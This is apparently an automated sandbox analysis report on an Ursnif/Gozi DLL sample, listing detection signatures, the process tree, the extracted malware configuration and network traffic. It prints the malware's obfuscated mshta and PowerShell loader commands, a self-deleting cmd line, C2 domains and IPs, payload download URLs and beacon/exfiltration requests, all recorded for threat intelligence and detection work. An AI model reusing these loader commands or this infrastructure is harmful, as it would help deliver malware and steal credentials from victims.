
Windows Analysis Report
2oCOO5LbPu.dll

Overview

General Information

Sample Name: 2oCOO5LbPu.dll
Analysis ID: 620323
MD5: 1217ff59e80cdae525287f2c6e9a43c6
SHA1: 71760323e2c6528c2d346d85c9a138edcea984aa
SHA256: 315b13c6d80997dd76a01c15b78651d7a1cb54f8432fc25ad95c8573ba4b52d6
Tags: dll, geo, Gozi, ISFB, ITA, Ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Tries to steal Mail credentials (via file / registry access)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Uses nslookup.exe to query domains
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
Self deletion via cmd delete
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Uses ping.exe to check the status of other devices and networks
Modifies the prolog of user mode functions (user mode inline hooks)
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Modifies the import address table of user mode modules (user mode IAT hooks)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • loaddll32.exe (PID: 3708 cmdline: loaddll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 4640 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 2284 cmdline: rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 7000 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
            • cmd.exe (PID: 4040 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\2oCOO5LbPu.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • PING.EXE (PID: 3088 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
            • RuntimeBroker.exe (PID: 4440 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
            • cmd.exe (PID: 5016 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1E0C.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 4948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • nslookup.exe (PID: 5996 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
            • cmd.exe (PID: 3248 cmdline: cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\1E0C.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 3104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • RuntimeBroker.exe (PID: 4724 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
            • cmd.exe (PID: 5472 cmdline: cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\2E09.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 1008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • RuntimeBroker.exe (PID: 4960 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
          • rundll32.exe (PID: 5180 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • mshta.exe (PID: 6576 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cq7h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cq7h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6932 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6972 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A11.tmp" "c:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 7008 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 7024 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5431.tmp" "c:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup
{"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings
00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
[list truncated: 46 entries]
Source | Rule | Description | Author | Strings
2.3.rundll32.exe.52f94a0.10.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
2.3.rundll32.exe.52f94a0.10.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
2.2.rundll32.exe.36d0000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
2.3.rundll32.exe.586a4a0.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
2.3.rundll32.exe.5916b40.2.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
[list truncated: 2 entries]
No Sigma rule has matched

Timestamp: 05/04/22-16:19:17.575336 | SID: 2033203 | Source Port: 49761 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 05/04/22-16:21:22.118696 | SID: 2823044 | Source Port: 49824 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 05/04/22-16:19:19.326271 | SID: 2033203 | Source Port: 49761 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 05/04/22-16:18:57.385228 | SID: 2033203 | Source Port: 49759 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 05/04/22-16:21:20.986284 | SID: 2031743 | Source Port: 49823 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 05/04/22-16:21:21.354584 | SID: 2031744 | Source Port: 49823 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 05/04/22-16:21:23.154439 | SID: 2823044 | Source Port: 49825 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 05/04/22-16:19:18.765869 | SID: 2033203 | Source Port: 49761 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 05/04/22-16:21:35.078524 | SID: 2831962 | Source Port: 49836 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 05/04/22-16:21:37.325898 | SID: 2831962 | Source Port: 49845 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected

AV Detection
                      Source: http://193.56.146.127/stilak32.rarAvira URL Cloud: Label: malware
                      Source: http://cabrioxmdes.at/images/V0NO_2B_2/BKtxKUyqNZPWTGW_2Fsb/gcra1vUcqfsugEwbqkg/clC4xOvGOnv1IfCbC3KpDN/55o4c2l5_2FQ5/A5h2Nudl/_2BMxe_2B5DeFfkUNA5tHFs/S3JUh8OxeK/2_2FH31SGSIQagA1v/1cdYZqzVHkrq/508837BCT1F/BqNIRlNPeT4DuE/7TejdrPxV03GXRoV_2Bn_/2BLetz9nfjFhAFKH/XzqzBZbDgeQBfEL/knvoVinzLGANv8j5GP/MiBxeoPgM/h0e0hiZpA4rDs4gKFEOR/z8BKZois5KcoiHgGkl6/XYwiOQ0Qo28lWHm/byQpQm.gifAvira URL Cloud: Label: malware
                      Source: http://193.56.146.127/stilak64.rarAvira URL Cloud: Label: malware
                      Source: http://193.56.146.127/cook32.rarAvira URL Cloud: Label: malware
                      Source: http://cabrioxmdes.at/images/ycZgts7gGB1TTI_2BJ/kAFzWH5dO/EouFwEOlBnMQFd_2B9cm/hFllbR62yV2D6DpnFIT/1m7iL_2BNn_2FiW_2Fey46/UbiTO8_2BKiyZ/X_2Fw6C8/_2BYemffpjXv9AYl0VWdt5P/DII_2F9NDv/YDhvS6DNSnB9Ol87V/O37_2FvxkOTf/eEAAdQaaXJB/BDgwSc3qOdxCUN/5Mw_2FSE2hFdSZTrFlwZP/7mWxeoDw9vW5V8uP/HsY9e6csLMEHi74/FnD5yUP5tDxrs5O87k/gamDdyFb5/q42.bmpAvira URL Cloud: Label: malware
                      Source: http://193.56.146.127/cook64.rarAvira URL Cloud: Label: malware
                      Source: http://cabrioxmdes.at/images/x2n_2BZq/cMTCmy3PTwcmYJsQtcFfdmd/RGHbCfH0Mi/_2F2XXxRKDznMaDCu/6VijCL7TOw6A/_2FZwep2qr_/2FWEPkZM5AVXte/9aqioax34nJsL5Jif0tvs/L_2FZYT61ziDpxF7/LpFCetnlC9m_2Bt/oUT730x_2F0HUFQM3Y/XzNhPma_2/B16XqKLqfQsgSGMPR6I2/0aqjgbQwdUeD2pbxvCW/nFGCHfIsUA4BQ8wKgww64R/38SNs6vk5dFLz/lF2ZfIKN/ONI_2FioD0xOFaZ_2BUESxI/wtoW_2F78Wali9Dqxz_/2F8R.bmpAvira URL Cloud: Label: malware
                      Source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
                      Source: 2oCOO5LbPu.dllReversingLabs: Detection: 50%
                      Source: 2oCOO5LbPu.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D5FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,2_2_036D5FBB
                      Source: 2oCOO5LbPu.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.pdb8 source: powershell.exe, 00000014.00000002.566709177.0000012312B1D000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.381155615.00000000068B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385084346.00000000068B0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: 2oCOO5LbPu.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.381155615.00000000068B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385084346.00000000068B0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.pdbXP source: powershell.exe, 00000014.00000002.568732109.0000012312B68000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0627FD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,2_2_0627FD47
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062765C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,2_2_062765C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0628BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,2_2_0628BAD1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062799BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,2_2_062799BC

Networking
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.189.151.28 80Jump to behavior
                      Source: C:\Windows\explorer.exeDomain query: gamexperts.net
                      Source: C:\Windows\explorer.exeDomain query: cabrioxmdes.at
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49759 -> 13.107.42.16:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49761 -> 185.189.151.28:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49761 -> 185.189.151.28:80
                      Source: TrafficSnort IDS: 2031743 ET TROJAN Ursnif Payload Request (cook32.rar) 192.168.2.4:49823 -> 193.56.146.127:80
                      Source: TrafficSnort IDS: 2031744 ET TROJAN Ursnif Payload Request (cook64.rar) 192.168.2.4:49823 -> 193.56.146.127:80
                      Source: TrafficSnort IDS: 2831963 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M2 192.168.2.4:49824 -> 13.107.43.16:80
                      Source: TrafficSnort IDS: 2831962 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M1 192.168.2.4:49824 -> 13.107.43.16:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49824 -> 13.107.43.16:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49824 -> 13.107.43.16:80
                      Source: TrafficSnort IDS: 2823044 ETPRO TROJAN W32.Dreambot Checkin 192.168.2.4:49824 -> 13.107.43.16:80
                      Source: TrafficSnort IDS: 2021813 ET TROJAN Ursnif Variant CnC Beacon 192.168.2.4:49825 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2831963 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M2 192.168.2.4:49825 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2831962 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M1 192.168.2.4:49825 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49825 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2823044 ETPRO TROJAN W32.Dreambot Checkin 192.168.2.4:49825 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2021830 ET TROJAN Ursnif Variant CnC Data Exfil 192.168.2.4:49836 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2831963 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M2 192.168.2.4:49836 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2831962 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M1 192.168.2.4:49836 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2021830 ET TROJAN Ursnif Variant CnC Data Exfil 192.168.2.4:49845 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2831963 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M2 192.168.2.4:49845 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2831962 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M1 192.168.2.4:49845 -> 116.121.62.237:80
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\System32\nslookup.exeDNS query: name: myip.opendns.com
                      Source: C:\Windows\System32\nslookup.exeDNS query: name: myip.opendns.com
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: global trafficHTTP traffic detected: GET /drew/VaQ3pTys7Q2R6kpf/_2FIc_2F8CXvB3Z/iOcDCMv_2Bzt_2BkvD/0oAvhggmG/_2Fl1lo2G6zaBPziefOU/0weuiBbGeNMoLKM6iCO/t_2BCeHyFsnS9bYnhwNoEp/71L2csZUwuj6M/Di72h_2F/YKcRH2nZoqJfjSIVybnSQum/ojRn6CbyHg/HZSkJJ16taI_2BtJ_/2BPgmXmwBiuC/GeqX1VmOJwL/BLm5b43yKc8DM1/cAyjDLhuSh3YL8e2h3G86/An0inHEid52NS1pJ/fzGWg5Z6i/S.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/ftkCw_2FHRlZ2H4Ez/kZzLPSWW1EjO/vrmRPaaHdKz/qSrMackZ3zyqc0/VWwRh_2FwCauXlH76SpSQ/WebWjWKotWlEjZol/i0khlMGcdRnqbLJ/HlNBrT1E6GXaxDAWHo/UE921lN_2/FjqHF75OT4VsLwnjVixS/PbEwWP4onYE8hLJvBBX/d_2BgNcvh2ZXGjR5_2FyXa/S5_2BQHrje5lp/MVCT87wg/yCb3LwnNfDTI2igwyNHJuPu/wEyNxQ1wIj/6Ok6nHxwE/MHgaOPodjh/7.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/j2JffNlXTHLPSjvkab/vvawbyEnZ/Hwlvs3aqIXBaZtIhRcgj/4HXnxsMpDrDAMvyWm_2/FmVqdMEPLr3zfDmaxNGUay/bz_2BSMy1l2QZ/EUwY7mKI/BhGCRzr1OkkgVWxbqU3mkVE/wA3v0qd0nJ/5B7wfgqElhGpmz3sa/_2F6sQ8OT_2B/8xTtmUQcdaG/oTkIYSJR4gLWwl/QQTNVlqw4bQdTnzAZ6CQ7/k1kym0P_2B_2FUsc/x2oonw84wvEvNXM/7_2BWWPnJGDR/PuJeNv7kx/T.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /stilak32.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /stilak64.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /cook32.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /cook64.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /images/V0NO_2B_2/BKtxKUyqNZPWTGW_2Fsb/gcra1vUcqfsugEwbqkg/clC4xOvGOnv1IfCbC3KpDN/55o4c2l5_2FQ5/A5h2Nudl/_2BMxe_2B5DeFfkUNA5tHFs/S3JUh8OxeK/2_2FH31SGSIQagA1v/1cdYZqzVHkrq/508837BCT1F/BqNIRlNPeT4DuE/7TejdrPxV03GXRoV_2Bn_/2BLetz9nfjFhAFKH/XzqzBZbDgeQBfEL/knvoVinzLGANv8j5GP/MiBxeoPgM/h0e0hiZpA4rDs4gKFEOR/z8BKZois5KcoiHgGkl6/XYwiOQ0Qo28lWHm/byQpQm.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: cabrioxmdes.atConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /images/ycZgts7gGB1TTI_2BJ/kAFzWH5dO/EouFwEOlBnMQFd_2B9cm/hFllbR62yV2D6DpnFIT/1m7iL_2BNn_2FiW_2Fey46/UbiTO8_2BKiyZ/X_2Fw6C8/_2BYemffpjXv9AYl0VWdt5P/DII_2F9NDv/YDhvS6DNSnB9Ol87V/O37_2FvxkOTf/eEAAdQaaXJB/BDgwSc3qOdxCUN/5Mw_2FSE2hFdSZTrFlwZP/7mWxeoDw9vW5V8uP/HsY9e6csLMEHi74/FnD5yUP5tDxrs5O87k/gamDdyFb5/q42.bmp HTTP/1.1Content-Type: multipart/form-data; boundary=318247997342640097891112487322User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: cabrioxmdes.atContent-Length: 563Connection: Keep-AliveCache-Control: no-cache
